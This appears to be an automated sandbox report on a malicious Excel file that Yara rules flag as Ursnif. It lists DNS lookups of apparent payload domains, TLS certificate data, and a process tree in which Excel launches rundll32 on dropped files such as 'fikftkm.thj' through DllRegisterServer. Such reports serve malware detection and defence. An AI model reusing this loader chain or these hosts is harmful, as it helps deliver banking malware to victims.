                                                                        Apr 7, 2021 10:56:05.989546061 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.989577055 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.989598989 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.989687920 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.989701986 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.989705086 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:06.040070057 CEST49170443192.168.2.22192.185.129.4
                                                                        Apr 7, 2021 10:56:06.182881117 CEST44349170192.185.129.4192.168.2.22

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Apr 7, 2021 10:56:01.397912025 CEST5219753192.168.2.228.8.8.8
                                                                        Apr 7, 2021 10:56:01.566401005 CEST53521978.8.8.8192.168.2.22
                                                                        Apr 7, 2021 10:56:02.648638010 CEST5309953192.168.2.228.8.8.8
                                                                        Apr 7, 2021 10:56:02.668864965 CEST53530998.8.8.8192.168.2.22
                                                                        Apr 7, 2021 10:56:02.681109905 CEST5283853192.168.2.228.8.8.8
                                                                        Apr 7, 2021 10:56:02.727189064 CEST53528388.8.8.8192.168.2.22
                                                                        Apr 7, 2021 10:56:03.847851038 CEST6120053192.168.2.228.8.8.8
                                                                        Apr 7, 2021 10:56:04.030041933 CEST53612008.8.8.8192.168.2.22
                                                                        Apr 7, 2021 10:56:04.644742966 CEST4954853192.168.2.228.8.8.8
                                                                        Apr 7, 2021 10:56:04.656749010 CEST53495488.8.8.8192.168.2.22
                                                                        Apr 7, 2021 10:56:04.664242983 CEST5562753192.168.2.228.8.8.8
                                                                        Apr 7, 2021 10:56:04.676858902 CEST53556278.8.8.8192.168.2.22
                                                                        Apr 7, 2021 10:56:05.858853102 CEST5600953192.168.2.228.8.8.8
                                                                        Apr 7, 2021 10:56:06.035976887 CEST53560098.8.8.8192.168.2.22
                                                                        Apr 7, 2021 10:56:07.362716913 CEST6186553192.168.2.228.8.8.8
                                                                        Apr 7, 2021 10:56:07.426685095 CEST53618658.8.8.8192.168.2.22
                                                                        Apr 7, 2021 10:56:07.901401043 CEST5517153192.168.2.228.8.8.8
                                                                        Apr 7, 2021 10:56:08.045149088 CEST53551718.8.8.8192.168.2.22

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                        Apr 7, 2021 10:56:01.397912025 CEST192.168.2.228.8.8.80x2c09Standard query (0)vts.us.comA (IP address)IN (0x0001)
                                                                        Apr 7, 2021 10:56:03.847851038 CEST192.168.2.228.8.8.80x82b3Standard query (0)mundotecnologiasolar.comA (IP address)IN (0x0001)
                                                                        Apr 7, 2021 10:56:05.858853102 CEST192.168.2.228.8.8.80xdfb5Standard query (0)accesslinksgroup.comA (IP address)IN (0x0001)
                                                                        Apr 7, 2021 10:56:07.362716913 CEST192.168.2.228.8.8.80xfa91Standard query (0)ponchokhana.comA (IP address)IN (0x0001)
                                                                        Apr 7, 2021 10:56:07.901401043 CEST192.168.2.228.8.8.80x1e93Standard query (0)comosairdoburaco.com.brA (IP address)IN (0x0001)

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                        Apr 7, 2021 10:56:01.566401005 CEST8.8.8.8192.168.2.220x2c09No error (0)vts.us.com207.174.213.126A (IP address)IN (0x0001)
                                                                        Apr 7, 2021 10:56:04.030041933 CEST8.8.8.8192.168.2.220x82b3No error (0)mundotecnologiasolar.com162.241.62.4A (IP address)IN (0x0001)
                                                                        Apr 7, 2021 10:56:06.035976887 CEST8.8.8.8192.168.2.220xdfb5No error (0)accesslinksgroup.com192.185.129.4A (IP address)IN (0x0001)
                                                                        Apr 7, 2021 10:56:07.426685095 CEST8.8.8.8192.168.2.220xfa91No error (0)ponchokhana.com5.100.155.169A (IP address)IN (0x0001)
                                                                        Apr 7, 2021 10:56:08.045149088 CEST8.8.8.8192.168.2.220x1e93No error (0)comosairdoburaco.com.br198.50.218.68A (IP address)IN (0x0001)

                                                                        HTTPS Packets

                                                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                        Apr 7, 2021 10:56:01.884533882 CEST207.174.213.126443192.168.2.2249165CN=vts.us.com CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBWed Aug 26 02:00:00 CEST 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019Fri Aug 27 01:59:59 CEST 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                        CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                                                                        CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029
                                                                        Apr 7, 2021 10:56:04.325406075 CEST162.241.62.4443192.168.2.2249168CN=mail.mundotecnologiasolar.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Wed Mar 17 19:57:39 CET 2021 Wed Oct 07 21:21:40 CEST 2020Tue Jun 15 20:57:39 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                        CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                        Apr 7, 2021 10:56:06.333168030 CEST192.185.129.4443192.168.2.2249170CN=webmail.accesslinksgroup.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri Feb 12 14:32:48 CET 2021 Wed Oct 07 21:21:40 CEST 2020Thu May 13 15:32:48 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                        CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                        Apr 7, 2021 10:56:07.525214911 CEST5.100.155.169443192.168.2.2249171CN=mail.ponchokhana.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Wed Mar 03 22:31:59 CET 2021 Wed Oct 07 21:21:40 CEST 2020Tue Jun 01 23:31:59 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                        CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                        Apr 7, 2021 10:56:08.283134937 CEST198.50.218.68443192.168.2.2249173CN=comosairdoburaco.com.br CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBSun Mar 14 01:00:00 CET 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004Sun Jun 13 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                        CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=USCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBMon May 18 02:00:00 CEST 2015Sun May 18 01:59:59 CEST 2025
                                                                        CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029

                                                                        Code Manipulations

                                                                        Statistics

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        Analysis Process: EXCEL.EXE PID: 2400 Parent PID: 584

                                                                        General

                                                                        Start time:10:55:35
                                                                        Start date:07/04/2021
                                                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        Wow64 process (32bit):false
                                                                        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                        Imagebase:0x13fe40000
                                                                        File size:27641504 bytes
                                                                        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: rundll32.exe PID: 2316 Parent PID: 2400

                                                                        General

                                                                        Start time:10:55:45
                                                                        Start date:07/04/2021
                                                                        Path:C:\Windows\System32\rundll32.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:rundll32 ..\fikftkm.thj,DllRegisterServer
                                                                        Imagebase:0xffc20000
                                                                        File size:45568 bytes
                                                                        MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: rundll32.exe PID: 2324 Parent PID: 2400

                                                                        General

                                                                        Start time:10:55:46
                                                                        Start date:07/04/2021
                                                                        Path:C:\Windows\System32\rundll32.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:rundll32 ..\fikftkm.thj1,DllRegisterServer
                                                                        Imagebase:0xffc20000
                                                                        File size:45568 bytes
                                                                        MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: rundll32.exe PID: 2880 Parent PID: 2400

                                                                        General

                                                                        Start time:10:55:46
                                                                        Start date:07/04/2021
                                                                        Path:C:\Windows\System32\rundll32.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:rundll32 ..\fikftkm.thj2,DllRegisterServer
                                                                        Imagebase:0xffc20000
                                                                        File size:45568 bytes
                                                                        MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: rundll32.exe PID: 2920 Parent PID: 2880

                                                                        General

                                                                        Start time:10:55:46
                                                                        Start date:07/04/2021
                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:rundll32 ..\fikftkm.thj2,DllRegisterServer
                                                                        Imagebase:0x630000
                                                                        File size:44544 bytes
                                                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000006.00000002.2275673660.0000000000270000.00000004.00000001.sdmp, Author: Joe Security
                                                                        Reputation:high

                                                                        Analysis Process: rundll32.exe PID: 1788 Parent PID: 2400

                                                                        General

                                                                        Start time:10:56:17
                                                                        Start date:07/04/2021
                                                                        Path:C:\Windows\System32\rundll32.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:rundll32 ..\fikftkm.thj3,DllRegisterServer
                                                                        Imagebase:0xffc20000
                                                                        File size:45568 bytes
                                                                        MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: rundll32.exe PID: 2988 Parent PID: 2400

                                                                        General

                                                                        Start time:10:56:17
                                                                        Start date:07/04/2021
                                                                        Path:C:\Windows\System32\rundll32.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:rundll32 ..\fikftkm.thj4,DllRegisterServer
                                                                        Imagebase:0xffc20000
                                                                        File size:45568 bytes
                                                                        MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Disassembly

                                                                        Code Analysis

                                                                        Reset < >